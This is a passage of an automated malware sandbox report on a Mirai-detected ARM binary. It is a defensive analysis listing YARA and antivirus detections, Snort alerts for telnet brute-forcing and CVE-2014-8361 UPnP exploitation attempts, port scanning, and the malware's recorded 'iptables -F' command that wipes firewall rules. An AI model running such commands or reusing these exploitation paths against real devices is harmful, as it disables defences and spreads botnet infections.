    5241.1.00000000f6abff04.000000008642ee32.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      5234.1.00000000f6abff04.000000008642ee32.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        5249.1.00000000f6abff04.000000008642ee32.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5236.1.00000000f6abff04.000000008642ee32.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            5237.1.00000000f6abff04.000000008642ee32.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              Click to see the 5 entries

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Multi AV Scanner detection for submitted fileShow sources
              Source: arm7ReversingLabs: Detection: 22%
              Source: /usr/bin/pkill (PID: 5284)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 5289)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 5294)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pulseaudio (PID: 5403)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 5446)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 5568)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 716 INFO TELNET access 43.230.20.243:23 -> 192.168.2.23:53370
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 65.61.91.118:23 -> 192.168.2.23:56886
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 65.61.91.118:23 -> 192.168.2.23:56886
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.21.111.201:23 -> 192.168.2.23:49798
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.21.111.201:23 -> 192.168.2.23:49798
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.21.111.201:23 -> 192.168.2.23:50074
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.21.111.201:23 -> 192.168.2.23:50074
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50996 -> 156.224.178.167:52869
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41418 -> 156.224.165.13:52869
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52732
              Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:57200 -> 203.251.92.20:23
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52756
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58178 -> 156.247.29.227:52869
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.20.222.131:23 -> 192.168.2.23:36414
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.20.222.131:23 -> 192.168.2.23:36414
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52794
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52834
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33754 -> 156.238.44.215:52869
              Source: TrafficSnort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 217.78.28.18: -> 192.168.2.23:
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52860
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52882
              Source: TrafficSnort IDS: 716 INFO TELNET access 43.230.20.243:23 -> 192.168.2.23:53864
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52926
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52970
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52990
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 43.230.20.243:23 -> 192.168.2.23:53864
              Source: TrafficSnort IDS: 716 INFO TELNET access 124.167.223.246:23 -> 192.168.2.23:38986
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53030
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.21.111.201:23 -> 192.168.2.23:50264
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.21.111.201:23 -> 192.168.2.23:50264
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53060
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 43.231.52.137:23 -> 192.168.2.23:37176
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 43.231.52.137:23 -> 192.168.2.23:37176
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53076
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53098
              Source: TrafficSnort IDS: 716 INFO TELNET access 43.230.20.243:23 -> 192.168.2.23:54094
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 124.167.223.246:23 -> 192.168.2.23:38986
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53172
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 65.61.91.118:23 -> 192.168.2.23:57594
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 65.61.91.118:23 -> 192.168.2.23:57594
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 171.119.28.35:23 -> 192.168.2.23:36956
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53198
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 43.230.20.243:23 -> 192.168.2.23:54094
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53220
              Source: TrafficSnort IDS: 716 INFO TELNET access 124.167.223.246:23 -> 192.168.2.23:39202
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53254
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53284
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53304
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 171.119.28.35:23 -> 192.168.2.23:37122
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53322
              Source: TrafficSnort IDS: 716 INFO TELNET access 43.230.20.243:23 -> 192.168.2.23:54306
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50834 -> 156.224.169.192:52869
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48656 -> 156.224.166.208:52869
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 124.167.223.246:23 -> 192.168.2.23:39202
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53354
              Source: TrafficSnort IDS: 716 INFO TELNET access 47.242.189.91:23 -> 192.168.2.23:41110
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53372
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 43.231.52.137:23 -> 192.168.2.23:37500
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 43.231.52.137:23 -> 192.168.2.23:37500
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 43.230.20.243:23 -> 192.168.2.23:54306
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53394
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 47.242.189.91:23 -> 192.168.2.23:41110
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 95.71.70.178:23 -> 192.168.2.23:52616
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 95.71.70.178:23 -> 192.168.2.23:52616
              Source: TrafficSnort IDS: 716 INFO TELNET access 124.167.223.246:23 -> 192.168.2.23:39368
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53410
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55330 -> 156.241.13.128:52869
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53426
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56096 -> 156.226.12.36:52869
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53448
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.21.111.201:23 -> 192.168.2.23:50788
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.21.111.201:23 -> 192.168.2.23:50788
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 171.119.28.35:23 -> 192.168.2.23:37268
              Source: TrafficSnort IDS: 716 INFO TELNET access 43.230.20.243:23 -> 192.168.2.23:54450
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53472
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 124.167.223.246:23 -> 192.168.2.23:39368
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53502
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55584 -> 156.240.106.64:52869
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 43.230.20.243:23 -> 192.168.2.23:54450
              Source: TrafficSnort IDS: 716 INFO TELNET access 124.167.223.246:23 -> 192.168.2.23:39580
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41586 -> 156.232.95.208:52869
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 95.71.70.178:23 -> 192.168.2.23:52836
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 95.71.70.178:23 -> 192.168.2.23:52836
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 43.231.52.137:23 -> 192.168.2.23:37754
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 43.231.52.137:23 -> 192.168.2.23:37754
              Source: TrafficSnort IDS: 716 INFO TELNET access 43.230.20.243:23 -> 192.168.2.23:54708
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 124.167.223.246:23 -> 192.168.2.23:39580
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34132 -> 156.224.191.36:52869
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35096 -> 156.232.92.226:52869
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41234 -> 156.224.153.31:52869
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 43.230.20.243:23 -> 192.168.2.23:54708
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 171.119.28.35:23 -> 192.168.2.23:37598
              Source: TrafficSnort IDS: 716 INFO TELNET access 124.167.223.246:23 -> 192.168.2.23:39768
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 209.204.37.7:23 -> 192.168.2.23:57376
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 209.204.37.7:23 -> 192.168.2.23:57376
              Source: TrafficSnort IDS: 716 INFO TELNET access 43.230.20.243:23 -> 192.168.2.23:54834
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43156 -> 156.224.169.218:52869
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 124.167.223.246:23 -> 192.168.2.23:39768
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 171.119.28.35:23 -> 192.168.2.23:37692
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 95.71.70.178:23 -> 192.168.2.23:53112
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 95.71.70.178:23 -> 192.168.2.23:53112
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 43.230.20.243:23 -> 192.168.2.23:54834
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 43.231.52.137:23 -> 192.168.2.23:38056
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 43.231.52.137:23 -> 192.168.2.23:38056
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.20.222.131:23 -> 192.168.2.23:37536
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.20.222.131:23 -> 192.168.2.23:37536
              Source: TrafficSnort IDS: 716 INFO TELNET access 124.167.223.246:23 -> 192.168.2.23:39894
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.21.111.201:23 -> 192.168.2.23:51250
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.21.111.201:23 -> 192.168.2.23:51250
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 218.173.79.111:23 -> 192.168.2.23:49508
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 218.173.79.111:23 -> 192.168.2.23:49508
              Source: TrafficSnort IDS: 716 INFO TELNET access 217.35.87.169:23 -> 192.168.2.23:49056
              Source: TrafficSnort IDS: 716 INFO TELNET access 43.230.20.243:23 -> 192.168.2.23:54968
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37348 -> 156.241.9.20:52869
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 65.61.91.118:23 -> 192.168.2.23:58492
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 65.61.91.118:23 -> 192.168.2.23:58492
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 43.230.20.243:23 -> 192.168.2.23:54968
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 95.71.70.178:23 -> 192.168.2.23:53310
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 95.71.70.178:23 -> 192.168.2.23:53310
              Deletes all firewall rulesShow sources
              Source: /bin/sh (PID: 5277)Args: iptables -F
              Connects to many ports of the same IP (likely port scanning)Show sources
              Source: global trafficTCP traffic: 41.133.193.5 ports 1,2,3,5,7,52869
              Source: global trafficTCP traffic: 197.148.92.15 ports 1,2,3,5,7,37215
              Uses known network protocols on non-standard portsShow sources
              Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41418 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 58178 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 58178 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 33754 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40188
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40202
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40220
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40240
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40256
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40268
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40272
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40276
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40288
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40304
              Source: unknownNetwork traffic detected: HTTP traffic on port 58178 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40326
              Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40334
              Source: unknownNetwork traffic detected: HTTP traffic on port 58762 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40344
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40354
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40360
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40370
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40376
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40378
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40392
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40422
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40458
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40478
              Source: unknownNetwork traffic detected: HTTP traffic on port 58762 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45674 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40486
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40496
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40502
              Source: unknownNetwork traffic detected: HTTP traffic on port 45674 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40506
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40522
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 40530
              Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46236 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45674 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40314 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46236 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40314 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58762 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46236 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58178 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 40314 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50834 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48656 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 45674 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38462 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50834 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48656 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 50834 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48656 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 40314 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46236 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55330 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 38462 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55330 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48790 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50834 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55330 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48656 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 45674 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55330 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 36468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46236 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58762 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40314 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48790 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 38462 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41586 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 36468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41586 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 36468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50834 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48656 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41586 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34132 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 35096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55330 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41234 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48790 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41586 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41234 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41234 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 34132 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 45674 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 43156 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38462 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41234 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41586 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 59190 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40314 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58178 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 59190
              Source: unknownNetwork traffic detected: HTTP traffic on port 46236 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34132 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50834 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48790 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48656 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55330 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56526
              Source: unknownNetwork traffic detected: HTTP traffic on port 37348 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41234 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56542
              Source: unknownNetwork traffic detected: HTTP traffic on port 51328 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56554
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56570
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56582
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56594
              Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56612
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56622
              Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 56628
              Source: unknownNetwork traffic detected: HTTP traffic on port 58762 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34132 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41586 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41234 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 38462 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45674 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48790 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55330 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 46236 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40314 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50834 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48656 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 34132 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41586 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 35096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 36468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58178 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 41234 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 58762 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55584 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 38462 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 48790 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55330 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 34132 -> 52869
